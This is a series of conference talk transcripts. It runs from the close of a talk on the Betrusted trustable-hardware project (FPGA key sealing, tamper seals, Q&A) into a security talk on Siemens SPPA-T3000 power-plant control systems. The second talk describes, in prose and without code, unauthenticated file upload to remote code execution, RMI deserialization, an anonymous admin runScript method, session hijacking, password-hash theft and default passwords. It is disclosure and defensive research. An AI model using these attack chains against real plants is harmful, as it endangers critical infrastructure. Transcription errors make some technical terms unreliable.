FPGA, it could be much, much thinner. So now let's talk a little about the last two points, user-sealable keys and verification and protection. And this is that third point, empowering end users to verify and seal their hardware. So it's great that we can verify something, but can it keep a secret? Transparency is good up to a point, but you want to be able to keep secrets so that people can't just walk in and say, oh, there are your keys, right? So, sealing a key in the FPGA: ideally we want user-generated keys that are hard to extract, we don't rely on a central key authority, and any attack to remove those keys should be noticeable, right?
So any high-level adversary — I mean someone with basically infinite funding — should take about a day to extract it, and that effort should be trivially evident. The solution to that is basically self-provisioning and sealing of the cryptographic keys in the bitstream, and a bit of epoxy. So let's talk a little bit about provisioning those keys. If we look at the 7-Series FPGA security, they offer encrypted bitstreams with AES-256 and SHA-256 HMAC. There's a paper which discloses a known weakness in it: the attack takes about a day and 1.6 million chosen-ciphertext traces. The reason why it takes a day is because that's how long it takes to load that many chosen ciphertexts through the interfaces. The good news is there are some easy mitigations to this. You can just glue shut the JTAG port or improve your power filtering, and that should significantly complicate the attack. But the point is that it will take a fixed amount of time to do this, and you have to have direct access to the hardware. It's not the sort of thing that someone at customs or an evil maid could easily pull off. And just to put that in perspective again: even if we dramatically improved the DPA resistance of the hardware, if we knew the region of the chip that we want to inspect, with a SEM and a skilled technician we could probably pull it off in a matter of a day or a couple of days. It takes only an hour to decap the silicon, a few hours in a FIB to delayer the chip, an afternoon in the SEM, and you can find out the keys, right? But the key point is that this is kind of the level that we've agreed is okay for a lot of the silicon enclaves, and this is not going to happen at a customs checkpoint or by an evil maid, so I think I'm okay with that for now. We can do better, but I think that's a good starting point, particularly for something that's so cheap and accessible. So then how do we get those keys into the FPGA and how do you keep them from getting out? Those keys should be user-generated, never leave the device, not be accessible by the CPU after it's provisioned, be unique per device, and it should be easy for the user to get it right — so you don't have to know all the stuff and type a bunch of commands to do it right, right? So if you look inside Betrusted, there are two rectangles there. One of them is the ROM that contains the bitstream, and the other one is the FPGA. So I'm going to draw those in a schematic form. Inside the ROM, you start the day with an unencrypted bitstream, which loads into the FPGA, and then you have this little crypto engine that has no keys on the inside; there are no keys anywhere. So you can check everything, you can build your own bitstream, you can do what you want to do. The crypto engine then generates keys from a TRNG that's located on chip, probably with some help from some off-chip randomness as well, because I don't necessarily trust everything inside the FPGA. Then that crypto engine can, as it encrypts the external bitstream, inject those keys back into the bitstream, because we know where that block RAM is. We can inject those keys back into that specific RAM block as we encrypt it. So we have a sealed, encrypted image on the ROM, which the FPGA can then literally only load if it has the key.
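A rough sketch of that self-provisioning flow is below, written as ordinary Python only to show the order of operations. The AES-GCM call stands in for the FPGA's own vendor-defined bitstream encryption, and the block-RAM offset, entropy sources and file handling are all assumptions, not the real Betrusted provisioning code.

```python
import hashlib
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

BRAM_KEY_OFFSET = 0x4000  # hypothetical offset of the key-holding block RAM

def derive_key(on_chip_trng: bytes, external_entropy: bytes) -> bytes:
    """Mix on-chip randomness with off-chip randomness so that neither
    source has to be trusted on its own."""
    return hashlib.sha256(on_chip_trng + external_entropy).digest()

def provision(plain_bitstream: bytes):
    # Stand-ins for the TRNG output and, say, user-supplied dice rolls.
    key = derive_key(os.urandom(32), os.urandom(32))

    # Inject the key into the known block-RAM region of the image first,
    # so the running design knows its own secret...
    image = bytearray(plain_bitstream)
    image[BRAM_KEY_OFFSET:BRAM_KEY_OFFSET + 32] = key

    # ...then seal the whole image. AES-GCM is only an illustration; the
    # FPGA's boot loader uses its own encryption and authentication scheme.
    nonce = os.urandom(12)
    sealed = nonce + AESGCM(key).encrypt(nonce, bytes(image), None)
    return key, sealed  # key goes into the FPGA's key engine, sealed image into ROM
```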
So after you've gone ahead and provisioned the ROM — hopefully at this point you don't lose power — you burn the key into the FPGA's key engine, which sets it to only boot from that encrypted bitstream, and you blow the readback-disable bit and the AES-only bit. So at this point in time there's basically no way to put in a bitstream that says, tell me your keys, whatever it is. You have to go do one of these hard techniques to pull out the key. You can maybe enable a hardware upgrade path if you want, by having the crypto engine retain a copy of the master key and re-encrypt it, but that becomes a vulnerability, because the user can be coerced into loading a bitstream that then leaks out the keys. So if you're really paranoid, at some point in time you seal this thing and it's done. You have to do that full key extraction routine to pull stuff out if you forget your passwords. So that's the user-sealable keys. I think we can do that with an FPGA. Finally, easy to verify and easy to protect — just very quickly talking about this. So if you want to make an inspectable tamper barrier, a lot of people have talked about glitter seals. Those are pretty cool, right? The problem is I find that glitter seals are too hard to verify. Like, I have tried glitter seals before, and I stared at the thing and I'm like, damn it, I have no idea if this is the seal I put down. And so then you say, okay, we'll take a picture or write an app or something. Now I'm relying on this untrusted device to tell me if the seal is verified or not. So I have a suggestion for a DIY watermark that relies not on an app to verify, but on the very, very well-tuned neural networks inside our heads to verify things. So the idea is basically there's this nice epoxy that I found. It comes in this bi-pack. It's a two-part epoxy. You just put it on the edge of the table and you go like this, and it mixes the epoxy and you're ready to use it. So it's very easy for users to apply. And then you just draw a watermark on a piece of tissue paper. It turns out humans are really good at identifying our own handwriting, right? Our own signatures, these types of things. Someone can try to forge it — there are people who are skilled in doing this — but this is way easier than looking at a glitter seal. You put that down on your device, you swab on the epoxy, and at the end of the day you end up with the tissue paper plus a very easily recognizable seal. If someone tries to take this off or tamper with it, I can look at it easily and say, yes, this is a different thing than what I had yesterday. I don't have to open an app. I don't have to look at glitter patterns. I don't have to do these sorts of things. And I can swab it onto all the IO ports that need it. So it's a bit of a hack, but I think it's a little closer towards not having to rely on third-party apps to verify a tamper evidence seal. So I've talked about this implementation and also talked about how it maps to these three principles for building trustable hardware. So the idea is trying to build a system that is not too complex, so that we can verify most of the parts, or all of them, at the end-user point — look at the keyboard, look at the display — and we can compile the FPGA from source.
We're focusing on verifying the entire system end to end, so the keyboard and the display. We're not forgetting the user. The secrets start with the user and end with the user, not at the edge of the silicon. And finally, we're empowering end users to verify and seal their own hardware, so you don't have to go to a central keying authority to make sure your secrets are inside your hardware. So at the end of the day, the idea behind Betrusted is to close that hardware time-of-check/time-of-use gap by moving the verification point closer to the point of use. So in this huge, complicated landscape of problems, the idea is that we want, as much as possible, to teach users to verify their own stuff. So by design, it's meant to be a thing that hopefully anyone can be taught to verify and use, and we can provide tools that enable them to do that. But if that ends up being too high a bar, I would like it that, within one or two hops in your immediate social network, anyone in the world can find someone who can do this. And the reason why I set this bar is I want to define the maximum level of technical competence required to do this. Because it's really easy, particularly sitting in an audience of really brilliant technical people, to say: of course, everyone can just hash things and compile things and look at things under microscopes and solder. And then you get into life and reality and it's like, oh wait, I have completely forgotten what real people are like. So this tries to get me grounded and make sure that I'm not drinking my own Kool-Aid in terms of how useful open hardware is as a mechanism to verify anything. Because you can hand a bunch of people a schematic and say, check this, but they're like, I have no idea. So the current development status is that the hardware is at kind of an initial EVT-stage prototype, subject to significant change — particularly because part of the reason we're here talking about this is to collect more ideas and feedback and make sure we're doing it right. The software is just starting. We're writing our own OS called Xous, being done by Sean Cross, and we're exploring the UX and applications, being done by Tom Marble, shown here. And I actually want to give a big shout-out to NLnet for funding us partially. We have a couple of grants under privacy and trust enhancing technologies. And this is really significant, because now we can actually think about the hard problems and not have to be like, oh, when do we go crowdfunded? When do we fundraise? A lot of people are just like, oh, this looks like a product, right? Can we sell this now? It's not ready yet, right? And I want to be able to take the time to talk about it, listen to people, incorporate changes, and make sure we're doing the right thing. So with that, I'd like to open up the floor for Q&A. Thanks, everyone, for coming to my talk. Thank you so much, Bunnie, for the great talk. We have about five minutes left for Q&A. For those who are leaving earlier: you're only supposed to use the two doors on the left, not the tunnel you came in through, but only the doors on the left, like the very left door and the door in the middle. Now, Q&A: you can line up at the microphones. Do we have a question from the internet? No, not yet. If someone wants to ask a question but is not present, but in the stream — or maybe a person in the room who wants to ask a question — you can use the hashtag #Clarke; Twitter, Mastodon, and IRC are being monitored.
So let's start with microphone number one. Your question, please. Hey, Bunnie. Hey. So you mentioned that with the foundry process, the hard IP blocks, the proprietary IP blocks, were a place where attacks could be made. Do you have the same concern about the hard IP blocks in the FPGA, either the embedded block RAM or any of the other special features that you might be using? Yeah, I think that we do have to be concerned about implants that have existed inside the FPGA prior to this project, right? I think there is a risk, for example, that there's a JTAG path we didn't know about. But the compensating side, I guess, is that the US military does use a lot of these in their devices, so they have a self-interest in not having backdoors inside of these things as well — we'll see. I think the answer is it's possible. I think the upside is that because the FPGA is actually a very regular structure, doing a SEM-level analysis of the initial construction of it, at least, is not insane. We can identify these blocks and look at them and make sure they have the right number of bits. That doesn't mean the one you have today is the same one. But if they were to modify that block to do an implant, my argument is that because of the randomness of the wiring and the number of factors they have to consider, they would have to actually grow the silicon area substantially, and that's a thing that is a proxy for detection of these types of problems. So that would be my kind of half answer to that problem. It's a good question, though. Thank you. Yeah, thanks for the question. Next one from microphone number three, please. Hi. Yeah, move closer to the microphone. Thanks. Hello. My question is: in your proposed solution, how do you get around the fact that the attacker, whether it's an implant or something else, will just attack it before the user's self-provisioning? So it will compromise the self-provisioning process itself. Right. So the idea of the self-provisioning process is that we send the device to you, you can look at the circuit boards and devices, and then you compile your own FPGA bitstream, which includes the self-provisioning code, from source, and you can confirm it — or if you don't want to compile, you can confirm that the signatures match what's on the internet. Right. And so if someone wanted to compromise that process and stash away some keys in some other place, that modification would either be evident in the bitstream or be evident as a modification of the hash of the code that's running on it at that point in time. So someone would have to then add a harder implant, for example, to the ROM, but that doesn't help, because it's already encrypted by the time it hits the ROM. So it really has to be an implant that's inside the FPGA, and the earlier question just talked about that situation itself. So I think the attack surface is limited, at least for that. So you talked about how the courier might be the hacker, right? So in this case, the courier would put a hardware implant not in the hard IP, but just in the piece of hardware inside the FPGA that provisions the bitstream. So the idea is that you would get that FPGA and you would blow your own FPGA bitstream yourself. You don't trust my factory to give you a bitstream. You get the device... You trust that the bitstream is being blown. You just get an indication on your computer saying this bitstream is being blown, right? I see.
I see. So how do you trust that the ROM actually doesn't have a backdoor in itself that's putting in another secret bitstream that's not related to... A problem for a courier or evil maid. Yeah, I mean, possible, I guess. I think there are things you can do, for example, to defeat that. So the way that we do the semi-randomness in the compilation is there's a 64-bit random number we compile into the bitstream. So if you're compiling your own bitstream, you can read out that number and see if it matches. At that point, if someone had pre-burned a bitstream onto it that they're actually using to load instead of your own bitstream, it's not going to have that random number, for example, on the inside. So I think there are ways to tell if, for example, the ROM has been backdoored and has two copies of the bitstream, the evil one and yours, and they're going to use the evil one during provisioning, right? I think that's a thing that can be mitigated. All right, thank you very much. We take the very last question from microphone number five. Hi, Bunnie. Hi. So one of the options you sort of touched on in the talk but then didn't pursue was this idea of doing some custom silicon in a very low-res process that could be optically inspected directly. Is that completely out of the question in terms of being a usable root in the future, or did you look into that in great detail at all? So I thought about that one. There are a couple of issues. One is that if we rely on optical verification, now users need optical verification equipment to do it. So we have to somehow move those optical verification tools to the edge, towards the time of use, right? The nice thing about the FPGA is that everything I talked about — building your own bitstream, inspecting the bitstream, checking the hashes — those are things that don't require particular user equipment. But yes, if we were to build an enclave out of 500-nanometer silicon, it would probably run at around 100 megahertz, you'd have a few kilobytes of RAM on the inside, not a lot, right? So you have a limitation in how much capability you have on it, and it would consume a lot of power. But then every single one of those chips, right, we put them in a black piece of epoxy. What keeps someone from swapping that out with another chip? Yeah, I mean, I was thinking of like old-school transparent top, like on a little... Oh, okay. So yeah, you can wire bond on the board, put some clear epoxy on, and now people have to take a microscope to look at that. That's a possibility. I think that's the sort of thing where I'm trying to imagine, for example, my mom using this and asking her to do this sort of stuff. I just don't envision her knowing anyone who would have an optical microscope who could do this, except for me, right? And I don't think that's a fair assessment of what is verifiable by the end user at the end of the day. So maybe for some scenarios it's okay, but I think that full optical verification of a chip, and making that the only thing between you and an implant, worries me. And that's the problem with the custom chip: even if it's just a clear package and someone swapped out the chip with another chip, right, you still need, you know, a piece of equipment to check that, right?
Whereas when I talked about the display and the fact that you can look at it, the argument for that is actually not that you have to check the display. It's that, because it's so simple, you don't need to check the display, right? You don't need the microscope to check it, because there's no place to hide anything. All right, folks, we ran out of time. Thank you very much to everyone who asked a question. And please give another big round of applause for our great speaker, Bunnie. Thank you so much for the great talk. Thanks, everyone. Thanks, everyone.
While open source is necessary for trustable hardware, it is far from sufficient. This is because “hashing” hardware – verifying its construction down to the transistor level – is typically a destructive process, so trust in hardware is a massive time-of-check/time-of-use (TOCTOU) problem. This talk helps us understand the nature of the TOCTOU problem by providing a brief overview of the supply chain security problem and various classes of hardware implants. We then shift gears to talk about ways to potentially close the TOCTOU gap, concluding with a curated set of verifiable components that we are sharing as an open source mobile communications platform – a kind of combination hardware and software distribution – that we hope can be useful for developing and deploying all manner of open platforms that require a higher level of trust and security. The inconvenient truth is that open source hardware is precisely as trustworthy as closed source hardware. The availability of design source only enables us to agree that the designer’s intent can be trusted and is likely correct, but there is no essential link between the hardware design source and the piece of hardware on your desk. Thus while open source is necessary for trustable hardware, it is far from sufficient. This is quite opposite from the case of open source software thanks to projects like Reproducible Builds, where binaries can be loaded in-memory and cryptographically verified and independently reproduced to ensure a match to the complete and corresponding source of a particular build prior to execution, thus establishing a robust link between the executable and the source. Unfortunately, “hashing” hardware – verifying its construction down to the transistor level – is typically a destructive process, so trust in hardware is a massive time-of-check/time-of-use (TOCTOU) problem. Even if you thoroughly inspect the design source, the factory could modify the design. Even if you audit the factory, the courier delivering the hardware to your desk could insert an implant. Even if you carried the hardware from the factory to your desk, an “evil maid” could modify your machine. This creates an existential crisis for trust – how can we know our secrets are safe if the very hardware we use to compute them could be readily tainted? This talk addresses the elephant in the room by helping us understand the nature of the TOCTOU problem by providing a brief overview of the supply chain security problem and various classes of hardware implants. We then shift gears to talk about ways to potentially close the TOCTOU gap. When thinking about hardening a system against supply chain attacks, every component – from the CPU to the keyboard to the LCD – must be considered in order to defend against implanted screen grabbers and key loggers. At every level, a trade-off exists between complexity and the feasibility of non-destructive end-user verification with minimal tooling: a system simple enough to be readily verified will not have the equivalent compute power or features of a smartphone. However, we believe that a verifiable system should have adequate performance for a select range of tasks that include text chats, cryptocurrency wallets, and voice calls. Certain high-risk individuals such as politicians, journalists, executives, whistleblowers, and activists may be willing to use a device that forgoes bells and whistles in exchange for privacy and security. 
With this in mind, the <https://betrusted.io>Betrusted project brings together a curated set of verifiable components as an open source mobile communications platform - a combination open source hardware and software distribution. We are sharing Betrusted with the community in the hopes that others may adopt it as a reference design for developing and deploying all manner of open platforms that require a higher level of trust and security.
10.5446/53183 (DOI)
One of the obvious critical infrastructures we have nowadays is power generation. If there's no power, we're pretty much screwed. Our next speakers will take a very close look at common industrial control systems used in power turbines and their shortcomings. So please give a warm round of applause to Reptap, Moradek and Kors. Good morning, Congress. Thank you for waking up in the morning. We will talk about the security of power plants today, specifically about the automation systems that are used in power plants. You might think that this is another talk about how insecure the whole industrial world around us is, and more or less it is. For years we and our colleagues have spoken about problems in industrial security. We are happy to say that things are getting better, but the tempo is a little bit different and it feels a little bit uncomfortable. So anyway, we will speak about how power plants are built, what the automation inside is, what the vulnerabilities are, and give a high-level overview of what you can do with this. But first, a little bit of introduction. We are security consultants. We work with a lot of industrial things like PLCs, RTUs, SCADAs, DCSs, whatever it is. We have been doing this for too long — for so long that we have a huge map of contacts with a lot of system integrators and vendors, and throughout this time we are not just doing consultancy work for some asset owner, for example a power plant; we also talk to other entities and we try to fix things all together. We work at Kaspersky, and actually the whole research was done not just by me, Radu and Alexander, who are here, but also with the help of Evgenia and two Sergeys. Something that is very important to note is that everything we will discuss right now was reported to the respective vendor basically a long time ago. You can see several vendors here, but more or less we will speak only about one vendor today. It is Siemens, but we would like you to understand that similar security issues can be found in all other industrial solutions from other vendors. You would find similar findings there, and it doesn't require weeks of work to find them, and this would be true specifically for all the other vendors which are not mentioned in the talk. Jokes aside, we will share security issues of real power plants out there, and it might look like we are kind of irresponsible guys, but in fact it is the other way around. I mean that to do some kind of research with these systems that are working in power plants you need to get access to them, you need time to do this research, you need to have some knowledge to do this research, and all these resources are limited for guys like us: for penetration testers, for auditors, for power plant operators and engineers. But for the bad guys, the potential attackers or adversaries, this is actually their job. They have a lot of investment to do some research. So we assume that the bad guys already know this, and we would like to share some information with the good guys so they would be able to act upon it. So let's get to the talk itself: power plants. Power plants are the most common way humans get their power, their electricity. They are everywhere around us, and I believe the closest one to Leipzig is called the Lippendorf power station, and during this research, when we were preparing the introduction, we were surprised how much information about power plants you can get from the internet.
It's not just, for example, a picture of that same power station on Google Maps; there are very good schematics in the marketing materials from vendors, because when they sell a system that automates power plant operations they sometimes start with the building construction, and on their websites you can find schematic pictures of which building does what and where you will find which equipment, and which versions of equipment are used in these systems. But if you don't have this experience you can just Google things and you will find out which systems are used for automation in power plants. For example, for Lippendorf it's a system that is called Siemens SPPA-T2000 and T3000, which actually has another Siemens system inside called Siemens SPPA-T3000. So it's a little bit confusing, and it is, and we are still confused. This is exactly the system that we will focus on today, the Siemens SPPA-T3000, and again, it could be any other automation system; it just happened that we've seen this system more often than others. There is a way you can actually see all the generation sites throughout the world, thanks to the carbon monitoring communities. This is not just power plants; this is also nuclear sites, wind generation, solar plants, etc. They are all here, marked by different fuel types of generation; for example, there are coal and gas power plants marked there. So the topic is really huge, and what we will focus on today in our talk is mostly the power plants which run on coal and gas. This is important to mention. The heart of each power plant is actually a turbine. We don't have a picture of a turbine on the slides, but more or less I think everybody has seen one on an airplane. They are very similar, specifically in terms of size and mostly how they work. On different vendors' websites you can actually find a lot of information about where those turbines are used, and this is for example the map of the turbines from Siemens. Not all turbines are used in power plants; they have a lot of different applications like chemical plants, oil and gas, and a lot of other things. But if you correlate this with the information from the previous slides you would be able to identify which systems are used by which power plant, and if you Google more information you can actually tell the versions and the generations of the systems that are used on these power plants.
This is important because of the vulnerabilities that we will discuss later on. Before we speak about what the automation on power plants is, we should understand a little bit how they work. We will go from right to left and it's very easy. A little notice: throughout the talk we will simplify a lot of things, for two reasons. One of them is to make it more suitable for the audience, and the other is that we don't really understand everything ourselves. So the first thing you need is fuel. Fuel could be, for example, coal or gas, and you put it inside the combustion chamber, where you set it on fire, and it will generate a lot of pressure which goes to the turbine, and because of the pressure the turbine begins to rotate. The turbine has a shaft which drives the electricity generator, which obviously generates electricity and puts it on the power grid. So it is important from now on to understand that when we generate some electricity at the power plant, we put this power not just, for example, into this congress center or into some city; we put it into a big thing called the power grid, where other entities will sell this electricity to different customers. There is also a very interesting point: when we generate this pressure and the combustion chamber is on fire, we have a lot of excess heat, and we have two options. One of them is to safely release it into the air with cooling towers. That is option number one, and the other option is to do some form of recuperation: for example, we take this heat, we heat water, the water produces steam, and we put this steam into a steam turbine and produce additional electricity; this is kind of an optimization of some form. So what is the automation in this process? The automation systems that are used on power plants are usually called distributed control systems, or DCSs, and everything that I just described is actually automated inside those systems. The vendor of the solution wants to simplify things for the operator, because we don't want hundreds of people working at the power plant; we just want maybe dozens of people working there. They want to simplify the whole process: the operators don't care about where they get this gas or coal or how much they need; they just should be able to stop the generation process, start it, and control one main thing, which is how much power we should produce to the power grid — like how many megawatts of electricity we should produce. This actually describes the complexity hidden inside these solutions, because there are a lot of small things happening inside, and we will discuss it a little bit later. As I said, these DCSs are not exclusively used at power plants; there are a lot of other sites that use the same solutions, the same software and hardware. A DCS is not just software that you can install; it's a set of hardware and software. There are input/output modules, sensors, etc. As I said, sometimes they start from building construction — like, here is a field, please build us a power station — so these are more complex projects most of the time. There are a lot of vendors doing this; as I said, we are focusing in this talk on the Siemens one. Just a short description of how simplified things are for operators of this DCS software. For example, if we would like to answer the question of how we would regulate the output in megawatts of our power plant, we would need to control basically three things — again, we are oversimplifying here. This is an example for a gas turbine: we would need to regulate how much gas we put inside the combustion chamber, we would control the flame temperature, and we would control the thing that gets air into the turbine. Basically three things that are controlled by simple PLCs in the whole system, and you would be able, for example, to change 100 megawatts to 150 megawatts based on these settings. So the system itself that we are going to discuss is called Siemens SPPA-T3000, and again, as with all other DCS systems from other vendors, this is a typical industrial system: it has all these things called PLCs, RTUs, HMI servers, OPC traffic, etc.
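Before moving on to the SPPA-T3000 architecture, here is a deliberately oversimplified illustration of that "three knobs" point: a toy proportional loop nudging fuel flow toward a megawatt setpoint. The plant model and gains are made up; a real turbine governor coordinates fuel, flame temperature and inlet air with far more care.

```python
def plant_output(fuel_flow: float) -> float:
    """Toy plant model: pretend electrical output scales linearly with fuel."""
    return 2.0 * fuel_flow  # MW per unit of fuel flow, an invented gain

def run_to_setpoint(setpoint_mw: float, steps: int = 15):
    fuel_flow = 50.0          # starting point, i.e. the plant already at 100 MW
    kp = 0.2                  # proportional gain, arbitrary
    for i in range(steps):
        output = plant_output(fuel_flow)
        error = setpoint_mw - output
        fuel_flow += kp * error   # the real loop also trims air inlet and flame temperature
        print(f"step {i:2d}: fuel={fuel_flow:7.2f}  output={output:7.1f} MW")

if __name__ == "__main__":
    run_to_setpoint(150.0)    # "change 100 megawatts to 150 megawatts"
```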
The only thing that is different specifically for Siemens SPPA-T3000 is that it has two main things called the application server and the automation server, and the software running on these servers is not what you will find in other installations. If you read the manuals for the systems from Siemens, there would be a lot of different networks and highways, and Siemens would state that there is no connection between the application network and external networks. In practice and in reality you will find things like a specific sensor network, for example for monitoring vibration and noises inside the turbine, and you will find a demilitarized zone, because all in all, power plant operators won't have on-site maintenance guys and engineers; they will try to do remote support, they will need to install updates for the operating system and signatures for their antiviruses, and they will need to push some OPC traffic — information about the generation process — outside, either to the corporate network or to some regulator, because the whole energy market is regulated and there are different entities who monitor how much electricity you are generating, or who basically tell you how much electricity you should generate, because that is how much electricity was sold on the energy market. Basically the whole talk is structured like this: we will speak first about the application server, then the automation server, and then give some summary. It all started with the process called coordinated vulnerability disclosure. We notified Siemens about some issues almost a year ago, and at the beginning of December Siemens published an advisory. It was not an advisory with just the issues from us; a lot of other teams also contributed to it. And this December — this year's December — doesn't mean that Siemens only just released the patches. The SPPA-T3000 is exclusively supported, meaning the system integrator for the system is Siemens itself, so throughout the year, after we notified them about some security issues, they started to roll out patches and install updates on the critical infrastructure they support, and hopefully they did it for all the sensitive issues. There are a lot of things to discuss here that we will skip because we are a little bit in a hurry — things like the fact that not all vulnerabilities are the same, and we use, for example, CVSS here to talk about how critical a vulnerability is, but it's actually not very applicable to industrial sites; you should understand what you can do with each vulnerability and how you can impact the process — and we will skip this part. There's actually a kind of threat model in the white paper that we will release later on, during January. So, the application server. The application server is the main resource that you would find in the SPPA-T3000 network: if someone remotely connects to the system, they will end up on the application server; if someone wants to start the generation process or to change some values, it would be the application server; and if there are other servers that, for example, try to communicate with the application server, they actually start their work by downloading their software from the application server and then executing it.
So the first thing you might notice here is that there are a lot of network ports available on this machine, and this is actually the first point: there is a huge attack surface for the adversary to choose from, whether they would like to compromise some Siemens software, Windows software, or some other third party. A huge attack surface, starting from the fact that all the installations of these SPPA systems are kind of different, so depending on the version and the generation you can find different Windows versions, from, I don't know, 2003 to 2016. Hopefully they are all updated right now, but because the update process for such installations is a hard thing to do — I mean, you should wait for a maintenance window, and that could be maybe once in half a year or once a year — you will always find some window where you can use remotely exploitable vulnerabilities; EternalBlue and BlueKeep are mentioned on this slide. There's tons of different additional software, like old Cygwin that will allow you to do privilege escalation, badly configured Tomcat, and we have here these funny pie charts that show how the configuration of different software aligns with the best practices from the CIS benchmarks — those are basically security configuration hardening guides. The most important thing on the application server is a lot of Java software, and in a minute Radu will tell you about this. Surprise, surprise: one of the most notable problems in the Siemens SPPA-T3000 is actually passwords. There are three important ranges. The first of them is that for all the installations before 2014 or maybe 2015, all the passwords for all power stations were the same, and you can easily Google them. We will also publish the full word list in the white paper. After those years Siemens started to generate unique passwords for each power plant, but until this year it was kind of hard to change these passwords, so you need to be aware of how to do this, you need to know the process, and you maybe need to contact your system integrator to do it. Starting from this December it will be much easier to change passwords; so in the past, even if you knew you had these issues, you were not able to simply change all these things. Along with the passwords you can find full diagrams and integrator documentation that can show you how the system is built, how it's operating, specific accounts, etc. And of course this was not published by Siemens; it was some power plant operators who thought it would be a good idea to share this information. So as I said, the most important thing on the application server is a bunch of Java applications, and please welcome Radu, who will share the details about this.
Not to be missed let's divide it into spaces in red zone the items that process request from thin client and redirect them to RMI services. And in green zone there are RMI services which act as network services on dynamic TCP ports. SPPA consists of containers each container can encapsulate inside one or more RMI services. All type of containers are represented on illustration and all of them have self-explanatory names. Before we go deep inside internals of SPPA let me introduce some tools which used in this research. First of all all JARs files inside SPPA are up to skated with commercial product but the security measure can be easily bypassed by public available tool, the investigator. Sometimes it is useful to see how ledger search where communicates with system. It helps to understand architecture of system and workflow of clients. In case of SPPA RMI detector was written. It represents RAL TCP streams in human readable formats. Inside it use method read object from JavasDK. And it is known that this method is unsafe to insecure digitalization. So be careful not to be exploited through remote pickup. The first pillar of SPPA is patch web server according it config folder auto software config can be accessed by unauthorized user. In fact this folder contains some sensitive information of system for example files PC system configuration data XML and files inside AFC contain start up options and configuration of all containers either application network or automation network. Else configuration of oriental application in Tomcat also can be accessed using this vulnerability. And about Tomcat. There are three web applications registered remote diagnostic viewer, manager and orient. According to configurations of Tomcat and Apache web server as orient serverlets can be accessed through HTTPS. And in the file web.xml there are list of all serverlets of orient application and the list is really huge. So some of these serverlets have attractive name for attacker for example browserlet. In fact it allows an authorize user, listing directories of operation system. Right in case of exploitation another serverlet is more attractive. File upload serverlet allows unauthorized file upload with system right. Parameters base dir and target name fully control the name of the file. So this vulnerability can be easily transformed to remote code execution. You can override some start up scripts of SPPA or simply inject the SPL in Tomcat web application and get remote code execution with system right. Else there are some serverlets which contains word service factory in the names. In fact they redirects HTTP request to RMI services. Right they passed parameters for HTTP request and search desirable RMI service according to parameter service URL and further invoke call to the public method of security service and the name of the method defined in serialized object in the data section of HTTP request. There are parameters of this calls also defined in this object. So now we have situation when theme client and fed client can access RMI services. But in case of fed client it can also directly communicate with RMI registry. So if application server missed some important data security updates it contains insecure digitalization vulnerability and using public to your serial we can simply exploit it and get code execution with system right again. The next task will be to list all available RMI services of SPPA system. This first step we simply use class locate registry of Java SDK and get big list of services. 
All but one are JMX RMI services. I assume that they provide some general interface to control and manage the containers of SPPA. For the first investigation we chose only the lookup service. In fact this service looks like a collection of other RMI services: using its public method list we get the names of all available services, and using a name and the public method lookup we get a reference to an RMI service. All the RMI services at this step implement the interface ServiceFactory. So based on this we can assume that this is again a collection of other RMI services, but in fact it doesn't have a public method to get the names of those services. So we need to decompile the class and find the factory methods which create RMI services, for example createAdminScript, and inside we can find the name of the created service. As can be guessed, it's the admin service. So using the public method getService and this name we finally get the reference to the next-level RMI service. And at the final step we get the references to the RMI services which perform the real job of SPPA. But these RMI services also contain a lot of public methods available to an unauthenticated user. So the attack surface of the SPPA system is really huge. So now that we have listed all the available RMI services, the next question is how authentication of client requests is performed on the system. To answer this question, let's look at how a client request to the security service is processed on the system. First of all, the client gets the reference to the security service using some client ID. Then the PC service factory tries to get a valid session for this client ID from the session manager. If the session manager fails in this task, an exception will be thrown and the client request will fail. But if it succeeds, a valid session ID is returned to the PC service factory. Then, in its turn, an instance of the security service is created in the factory method, and the value of the session ID is stored as a login ID inside the security service. And finally the client gets the reference to the security service. Then he can call some public method of it, but these methods can perform privilege checks on the user, using the login ID, in the security manager. So to sum up, we have two security measures in this system, but there is a question: how can a user client perform a login operation if he doesn't have any valid client ID? In this case, at startup of the system the session manager adds an anonymous session with client ID equal to zero, and the client uses this client ID to perform the login operation. But an attacker can also use this feature and simply bypass the first check. So to sum up, there is only one security measure on the system, and it is fully delegated to the methods of the remote services. But the number of remote services is huge, the number of public methods is really huge, and so it becomes really difficult to manage the security of the system under these conditions. So we know all the inputs of the system, we know all the possible security measures of the system, so it's time to find vulnerabilities. In the list of remote services there is one which looks rather attractive. It's the admin service. It can be accessed with the anonymous session, and inside it has a public method runScript. This method doesn't perform any privilege checks, so we can call it without any credentials and so on.
As a first step, this method creates an instance of a class loader using bytes from its arguments, and in fact this step will load an arbitrary Java class. This class should implement the interface AdminScript and define a method execute, and this execute method will be called by runScript of the remote service. For this case we created a Java class that simply runs an OS command taken from the arguments of runScript, and we get code execution on the system with SYSTEM rights. Of course there is more powerful post-exploitation of this vulnerability than simply running an OS command. This vulnerability allows you to inject an arbitrary Java class into the running SPPA application, so you can use Java reflection to patch some variables of the system and influence the technological process of SPPA. Also, the privilege checks inside the methods of the remote services can be bypassed with a second vulnerability, in the session service. This service has a public method getLoginSessions. In fact this method returns the session data of all logged-in users on the system. This information includes user names, IPs and client IDs. So if among these there is the client ID of a user that has some admin privileges, an attacker can use this client ID to get a reference to the security service, and this reference will come with a more privileged session. Further, the attacker can call a public method of the security service, get all users, and obtain all private information about all users of the system — and password hashes are also included in this private information. So to sum up, both of these vulnerabilities can be reached through HTTPS, and firewall rules can be bypassed. In general, communications with the remote services are not encrypted, so user names and password hashes are transferred in plain text. This is more critical for the fat client case. Moreover, the authentication doesn't have any session or replay protection mechanism, so if an attacker can perform a man-in-the-middle attack against some user of this pipeline and capture the traffic between this user and the application server, he can get a valid username and password hash for the system, simply reuse these credentials and perform a login operation on the system. Moreover, he can also change the password of this user. I have talked a lot about user names and password hashes, so it's time to understand how these items are organized on the system. Alex? Hello everyone. Let's continue our discussion about the application server. On the previous slide you can see how remote authentication works, and now I'm going to tell you how it's organized locally. After the system starts, it begins to read two files, user1.xml and pdata1, to get the user list and the passwords respectively. The user1 file is a simple XML, while pdata1 has a slightly more complicated structure. It's a gzip archive encoded in base64, with a serialized object inside the archive containing a specific XML. The fields of the XML are presented on the slide. They are used to calculate the hash value and check the password during authentication. At the bottom of the slide you can see the password check algorithm in pseudocode. The scheme is typical for a crypt-style hash scheme like on a Linux machine. It has a number of iterations, salts, and the only thing that was added is a hard-coded salt which is the same for all users.
